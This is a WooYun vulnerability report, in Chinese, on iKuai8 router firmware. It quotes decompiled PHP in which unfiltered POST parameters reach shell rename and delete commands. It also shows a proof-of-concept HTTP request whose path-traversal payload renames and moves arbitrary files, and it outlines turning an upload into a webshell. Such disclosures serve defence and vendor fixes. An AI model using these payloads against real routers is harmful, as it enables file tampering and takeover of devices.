当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122633

漏洞标题:爱快流控路由最新版(iKuai8_2.4.4_Build20150604-17_41)固件漏洞挖掘分析之二

相关厂商:爱快免费流控路由

漏洞作者: Bear baby

提交时间:2015-06-25 09:55

修复时间:2015-09-23 14:34

公开时间:2015-09-23 14:34

漏洞类型:非授权访问

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向第三方安全合作伙伴开放
2015-08-19: 细节向核心白帽子及相关领域专家公开
2015-08-29: 细节向普通白帽子公开
2015-09-08: 细节向实习白帽子公开
2015-09-23: 细节向公众公开

简要描述:

固件版本:iKuai8_2.4.4_Build20150604-17_41
固件下载地址:http://patch.ikuai8.com/iso/iKuai8_2.4.4_Build20150604-17_41.iso
分析使用到的工具:EditPlus、DreamWeaver、Zend Studio、Ida Pro 6.1、BeyondCompare、Fiddler、中国菜刀、Kali、VisualStudio2010、vmware11等
注:本文基于逆向获取到的源文件进行分析。
本集要说的是任意文件操作那些事。。

详细说明:

任意文件操作
1、文件上传
爱快流控路由器系统在多个地方使用了文件上传功能如
系统设置-升级备份-版本升级
系统设置-升级备份-系统备份
认证计费-认证账号管理-账号管理
行为管理-分组管理-终端信息管理
行为管理-网站浏览控制-云安全
行为管理-网站浏览控制-本地拦截
等等十几处地方。
这些上传均使用/application/helpers/function_helper.php里面的ik_upload()函数进行上传。ik_upload()代码如下

/**
* 功能:上传文件
* 参数
* $obj : 提交$this 对象
* $file : 上传控件的名字
* $dir : 上传路径
* $filename : 上传的文件名
*
*/
function ik_upload($obj,$file='userfile',$dir,$filename=''){
/*
switch ($filename) {
case 'system.test':break;
case 'b.jpg':break;
default: echo "<script>alert('NO File!');</script>";exit;
}
*/
$config['upload_path'] = $dir;
$config['allowed_types'] = 'txt|bak|import|patch|lib|zip|rar'; //只允许上传类型
$config['file_name'] = $filename;
$config['overwrite'] = TRUE;
//print_r($config);exit;

$obj->load->library('upload', $config);
if (!$obj->upload->do_upload($file))
{
$data = array('error' => $obj->upload->display_errors());
}
else
{
$data = array('upload_data' => $obj->upload->data());
// echo "<script>alert('upload ok!');history.back();<//script>";
}
//print_r($data);
if(isset($data['error'])){
//echo "<script>alert('上传文件失败!');history.back();<//script>;";
return false;
}else{
return true;
}
}


该函数调用框架中CI_Upload do_upload进行文件上传处理,具体过程略过。知道有这些地方可以上传文件即可。
2、重命名、移动任意文件
接下来说明文件重命名的问题,该系统中共有三处用到重命名的功能。
分别是:
/application/controllers/Service/local_storage.php
/application/controllers/System/backup.php
/application/controllers/System/update.php
其中local_storage.php是服务中心里面的功能,但在系统中没有菜单,隐藏不体现可能是测试功能。update.php是升级备份中的版本升级功能页面,存在重命名功能,但在页面上也没体现,可能为遗留或者测试功能。backup.php是升级备份中的系统备份功能页面。
这几个页面的重命名函数均为save()代码如下:

//编辑保存
public function save(){
shellControl($this->shellmodel,'rename '.$_POST['old_bakname'].' '.$_POST['bakname'],'',false);
echo json_encode($_POST);
}


调用了shellControl函数执行重命名,shellControl在/application/helpers/db_helper.php中。
shellControl函数代码如下:

/* 
@功能:对shell命令的操作进行二次封装
@参数:
$model--对应模块
$shell--shell命令
$data --拼接数据
@返回:string or array
@data:20140211 by tian
>/dev/null 2>/dev/null &
*/
function shellControl($model,$shell,$data=array(),$return=true){ //默认有返回值的
if(!$data){
$str = '';
}else{
if(!is_array($data))return false;
$key = array_keys($data);
$val = array_values($data);
$str = '';
foreach($key as $k=>$v){
//$str .= $v.'="'.$val[$k].'" ';
$str .= $v."='".$val[$k]."' ";
}
}
$redirt = '>/dev/null 2>/dev/null &';
if(!$return){
ikExec($model,$shell." ".trim($str).' '.$redirt);//重定向没有返回值
//echo sqlMsg();exit;
}else{
$res = json_decode(ikExec($model,$shell." ".trim($str)),true);
}

return $return?$res:'ok';//暂时返回OK
}


从函数功能描述就可以看出调用shell命令来执行的,参数是通过拼接进行。该函数对命令及参数进行拼接处理,然后调用libikphp.so里面的ikExec来执行命令。这个函数涉及到命令执行漏洞,这边暂且不提,后面再进行分析,现在主要是讲文件重命名的问题。
save函数里面只有两个参数,都是POST来的。old_bakname 旧文件名,bakname 新文件名。由于这个函数没有对参数进行任何过滤等防护操作。所以我们可以通过控制这两个参数,来达到重命名任意文件的效果。如果参数里面添加路径参数,可以把文件移动到任意位置。看到这边,完全可以想到,通过上传文件-重命名为php,即可获取到webshell。
下面来验证一下:

漏洞证明:

1)重命名任意文件
首先使用前面的正向shell,在系统根目录创建一个文件test.txt

1.png


echo test>/test.txt


然后用Fiddler向系统备份页面POST一个修改文件名的请求。将根目录下的test.txt重命名为newtest.txt。如下

Request
POST http://192.168.1.1/System/backup/save HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.1/System/backup
Content-Length: 70
Cookie: PHPSESSID=e6b8bf28447de49246be1ee4b7876e49
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
bakname=..%2F..%2F..%2Fnewtest.txt&old_bakname=..%2F..%2F..%2Ftest.txt
RESPONSE
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.1
Content-Type: text/html;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Fri, 24 Apr 2015 08:23:14 GMT
Server: lighttpd/1.4.30
Content-Length: 74
{"bakname":"..\/..\/..\/newtest.txt","old_bakname":"..\/..\/..\/test.txt"}


ls一下看看文件名是否改变,如下图。test.txt已经成功变成newtest.txt

2.png


已经成功重命名根目录下面的文件。
2)移动任意文件
上面演示重命名任意文件,接下来看看移动任意文件,也是通过post文件名,区别在于改变新文件名的路径。我们把刚的newtest.txt移动到网页目录下abc.txt。
bakname=..%2F..%2F..%2Fusr%2Fikuai%2Fwww%2Fabc.txt&old_bakname=..%2F..%2F..%2Fnewtest.txt

3.png


3、删除任意文件
系统中共有两处地方涉及到,分别在
/application/controllers/System/backup.php
/application/controllers/System/update.php
函数名opera(),代码如下

//删除、恢复
function opera(){
$type = trim($_POST['type']);
switch($type){
case 'del':
shellControl($this->shellmodel,'del_bak '.$_POST['bakname']);//暂无返回值
echo json_encode(array("recode"=>'0','error'=>'ok'));
break;
case 'recover':
$res = shellControl($this->shellmodel,'restore '.$_POST['bakname']);
//print_r($data);exit;
if($res['res'] == '1'){
$data['recode'] = '0';
$data['recover'] = '1';
}else{
$data['recode'] = '100';
$data['error'] = '备份恢复失败!';
}
echo json_encode($data);
break;
}
}


问题和重命名一样,没有做任何处理,调用shell命令 删除 POST上来的bakname参数所指文件名,这边不在演示操作。
总结:
这个系统里面对文件的操作没有进行过滤,导致可以重命名、移动、删除。另外/application/controllers/Service/local_storage.php本地存储的页面,如下

4.png


可以进行文件上传、重命名、创建目录、列目录、获取硬盘信息等等,且和前面的一样,基本没什么过滤。可能页面不完善直接web操作有问题,通过Fiddler Post可以进行操作。

修复方案:

这个还是你们自己解决把···要去复习了。。不要恨我。

版权声明:转载请注明来源 Bear baby@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-25 14:33

厂商回复:

又来一波,争取一次处理完成,感谢白帽子兄弟,好好复习。。。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-25 18:38 | Angelic47 ( 路人 | Rank:1 漏洞数:1 )

    厂家回复好温馨

  2. 2015-06-27 07:19 | 爱快免费流控路由(乌云厂商)

    @Angelic47 作为负责任,对白帽子也懂得尊重的企业,我的答复属于一个比较合理范围,如果是再年轻10岁,我差不多都要说亲,感谢,么么哒一类的

  3. 2015-06-28 23:11 | Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)

    @爱快免费流控路由 在假设年轻十岁的基础上判断………28以上40以下